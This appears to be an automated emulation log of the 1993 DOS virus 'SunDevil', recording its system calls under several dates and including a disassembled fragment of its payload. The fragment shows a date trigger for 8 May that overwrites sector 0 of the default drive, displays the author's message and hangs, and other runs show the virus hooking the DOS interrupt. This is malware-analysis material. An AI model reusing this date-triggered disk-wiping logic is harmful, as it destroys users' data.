{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14759,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:41:36.50570675Z | 42 | PC: 12a71 | Get date 0x12a71: cmp dx, 0x508 0x12a75: je 0x12a79 0x12a77: jmp 0x12a95 0x12a79: mov ah, 0x19 0x12a7b: int 0x21 0x12a7d: xor bx, bx 0x12a7f: mov cx, 1 0x12a82: xor dx, dx 0x12a84: int 0x26 0x12a86: popf 0x12a87: push cs 0x12a88: pop ds 0x12a89: lea dx, word ptr [bp + 0x9f] 0x12a8d: mov ah, 9 0x12a8f: int 0x21 0x12a91: int 5 0x12a93: jmp 0x12a91 0x12a95: call 0x12aef 0x12a98: sub ax, 0x1000 0x12a9b: push ax |
| 2018-12-25T12:41:36.507532122Z | 53 | PC: 12ac2 | Get interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T12:41:36.508943133Z | 37 | PC: 12ae9 | Set interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T12:41:36.511089601Z | 76 | PC: 12a45 | Terminate with return code (Return code = '0') |
{"DateBased":true,"Day":8,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14759,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:41:36.485465025Z | 42 | PC: 12a71 | Get date 0x12a71: cmp dx, 0x508 0x12a75: je 0x12a79 0x12a77: jmp 0x12a95 0x12a79: mov ah, 0x19 0x12a7b: int 0x21 0x12a7d: xor bx, bx 0x12a7f: mov cx, 1 0x12a82: xor dx, dx 0x12a84: int 0x26 0x12a86: popf 0x12a87: push cs 0x12a88: pop ds 0x12a89: lea dx, word ptr [bp + 0x9f] 0x12a8d: mov ah, 9 0x12a8f: int 0x21 0x12a91: int 5 0x12a93: jmp 0x12a91 0x12a95: call 0x12aef 0x12a98: sub ax, 0x1000 0x12a9b: push ax |
| 2018-12-25T12:41:36.489155376Z | 25 | PC: 12a7d | Get default drive |
| 2018-12-25T12:41:36.50247512Z | 9 | PC: 12a91 | Display string (String= ' There is no America. There is no Democracy. There is only IBM, ITT, and AT&T. This virus is dedicated to all that have been busted for computer hacking activities. The SunDevil Virus (C)1993 by Crypt Keeper [SUNDEVIL] ') |
{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14759,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:41:37.184141443Z | 42 | PC: 12a71 | Get date 0x12a71: cmp dx, 0x508 0x12a75: je 0x12a79 0x12a77: jmp 0x12a95 0x12a79: mov ah, 0x19 0x12a7b: int 0x21 0x12a7d: xor bx, bx 0x12a7f: mov cx, 1 0x12a82: xor dx, dx 0x12a84: int 0x26 0x12a86: popf 0x12a87: push cs 0x12a88: pop ds 0x12a89: lea dx, word ptr [bp + 0x9f] 0x12a8d: mov ah, 9 0x12a8f: int 0x21 0x12a91: int 5 0x12a93: jmp 0x12a91 0x12a95: call 0x12aef 0x12a98: sub ax, 0x1000 0x12a9b: push ax |
| 2018-12-25T12:41:37.187147547Z | 53 | PC: 12ac2 | Get interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T12:41:37.188587224Z | 37 | PC: 12ae9 | Set interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T12:41:37.190349142Z | 76 | PC: 12a45 | Terminate with return code (Return code = '0') |
{"DateBased":true,"Day":8,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14759,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:41:38.0901996Z | 42 | PC: 12a71 | Get date 0x12a71: cmp dx, 0x508 0x12a75: je 0x12a79 0x12a77: jmp 0x12a95 0x12a79: mov ah, 0x19 0x12a7b: int 0x21 0x12a7d: xor bx, bx 0x12a7f: mov cx, 1 0x12a82: xor dx, dx 0x12a84: int 0x26 0x12a86: popf 0x12a87: push cs 0x12a88: pop ds 0x12a89: lea dx, word ptr [bp + 0x9f] 0x12a8d: mov ah, 9 0x12a8f: int 0x21 0x12a91: int 5 0x12a93: jmp 0x12a91 0x12a95: call 0x12aef 0x12a98: sub ax, 0x1000 0x12a9b: push ax |
| 2018-12-25T12:41:38.092822872Z | 25 | PC: 12a7d | Get default drive |
| 2018-12-25T12:41:38.106154459Z | 9 | PC: 12a91 | Display string (String= ' There is no America. There is no Democracy. There is only IBM, ITT, and AT&T. This virus is dedicated to all that have been busted for computer hacking activities. The SunDevil Virus (C)1993 by Crypt Keeper [SUNDEVIL] ') |